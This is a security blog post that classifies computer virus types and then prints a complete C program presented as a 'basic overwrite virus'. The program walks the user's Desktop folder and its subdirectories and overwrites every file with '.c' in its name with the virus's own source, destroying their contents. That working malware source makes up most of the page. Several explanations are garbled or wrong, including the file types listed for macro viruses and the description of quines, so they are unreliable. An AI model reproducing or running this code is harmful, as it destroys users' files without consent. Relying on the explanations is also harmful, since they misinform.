======================
== gkourgkoutas.net ==
======================
Rethink Security

Virus

security hacking code development

And I’m not talking about the Corona one here.

Definition

A computer virus is a type of malicious software program (“malware”) that, when executed, replicates itself by modifying other computer programs and inserting its own code. Infected computer programs can include as well, data files, or the “boot” sector of the hard drive. When this replication succeeds, the affected areas are then said to be “infected” with a computer virus. - wikipedia1

Macro Virus

A macro virus searches for other files with a specific file extension and then appends its own code to the file content. The most popular file extensions used by this type of viruses are:

  • .exe
  • .com
  • .bat
  • .cmd
  • .doc
  • .jar
  • .vbs

Overwrite Virus

Similar to a macro virus. The difference here is that the target file content will be deleted with source code of the virus.

Polymorph Virus

This sort of virus hides its presence by encrypting its own code. This process is structured into two parts:

  1. Virus decryption routine

    The code decrypts the encrypted virus body back to its original form, so the virus can perform activities.

  2. Virus encryption routine

    After performing activities the virus encrypts its body back to an unreadable form. The decryption routines stays the same. With this strategy the virus tries to avoid AV protection from operating systems.

Metamorphic Virus

Like the polymorph version, this type of virus changes its appearance. The difference here is that it uses a new encryption algorithm every time it starts the encryption routine.

Quine Virus

A virus that copies its source code to another file while using only one pointer. Normally a program needs two pointers (one source and one target pointer). These pointers are needed to copy data from source to target. More can be found here: Quine (computing)

Basic Overwrite Virus

This is some code written in the C programming language. This code example will try to change to /home/desktop and tries to scan the subdirectories. Every file in this directory and the first layer of subdirectories with a ~c*~ extension will be overwritten. Which in this case would infect files like ~.com~ , ~.cmd~ or ~.c~. For the sake of clarity and debugging, error messages are implemented to follow the process. This code is designed with unix like operating systems in mind.

#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <pwd.h>

char pathToTargetFiles [1024];
char pathToLastOrigin [1024];
char arrayOfDirectorys[2048][1024];

void getSubDirectorys()
{
    int i = 0;
    DIR *dire;
    struct dirent *ent;

    if ((dire = opendir (pathToTargetFiles)) != NULL) 
    {
        while ((ent = readdir (dire)) != NULL) 
        {
            char *isItADirectory = ent->d_name;

            if(opendir(isItADirectory) && !(strstr(isItADirectory, "."))) 
            {
                strcpy(arrayOfDirectorys[i], isItADirectory);
                i++;
            }    
        }

        closedir (dire);
    }
    else 
    {
        perror ("Could not open recursive directory");
    }
}

//copy own source code to any c file in current directory
void infectFiles()
{
    int copyCodeToFile;
    FILE *fp1, *fp2;

    DIR *d;
    struct dirent *dir;
    d = opendir(".");

    if(d)
    {
        while((dir = readdir(d)) != NULL)
        {
            char *currentFilePointer = dir->d_name;

            //we look for all c files in current directory
            if( strstr(currentFilePointer, ".c"))
            {
                printf("We should open %s to write our code in it!\n", currentFilePointer);
                fp1 = fopen(pathToLastOrigin, "r");
                fp2 = fopen(currentFilePointer, "w");

                if(fp1 == NULL || fp2 == NULL)
                {
                    fclose(fp1);
                    fclose(fp2);
                    continue;
                }   
                else
                {
                    copyCodeToFile = fgetc(fp1);

                    while (copyCodeToFile != EOF)
                    {
                        fputc(copyCodeToFile, fp2);
                        copyCodeToFile = fgetc(fp1);
                    }

                    fclose(fp1);
                    fclose(fp2);
                }
            }
        }
    }

    closedir(d);
}

//way to home dir
void pathTravaller()
{
    //getting user home directory
    struct passwd *pw = getpwuid(getuid());
    const char *homedir = pw->pw_dir;
    if(homedir == NULL)
        printf("Could not find home directory");

    strcpy(pathToTargetFiles, homedir);
    strcat(pathToTargetFiles, "/Desktop");

    //getting path to source code
    char cwd[1024];
    if (getcwd(cwd, sizeof(cwd)) == NULL)
        printf("Could not find current working directory");

    strcpy(pathToLastOrigin, cwd);
    char sourceFile [] = __FILE__;
    char addSlash [100] = "/";

    strcat(addSlash, sourceFile);
    strcat(pathToLastOrigin, addSlash);

    //finally change in the Desktop directory
    chdir(pathToTargetFiles);

    //getting first layer of subdirectorys
    getSubDirectorys();

    int z = 0;

    //change in every subdirectory and infect all c files
    while(!chdir(arrayOfDirectorys[z]))
    {
        printf("%d\n", z);
        printf("%s\n", arrayOfDirectorys[z]);
        infectFiles();
        chdir(pathToTargetFiles);
        z++;
    }
}

int main()
{
    pathTravaller();

    return 0;
}

Quine virus example

The following code snippets illustrates how a quine virus would work. As can be seen, this can be achieved via recursive loops.

int main()
{
    printf(int main() /n { /n printf(int main() /n { /n printf(int main ...
}

However this one would never end, thus only usable for example purposes.

As always, more usefull resources on this topic can be found on wikipedia.


  1. https://en.wikipedia.org/wiki/Quine_%28computing%29 ↩︎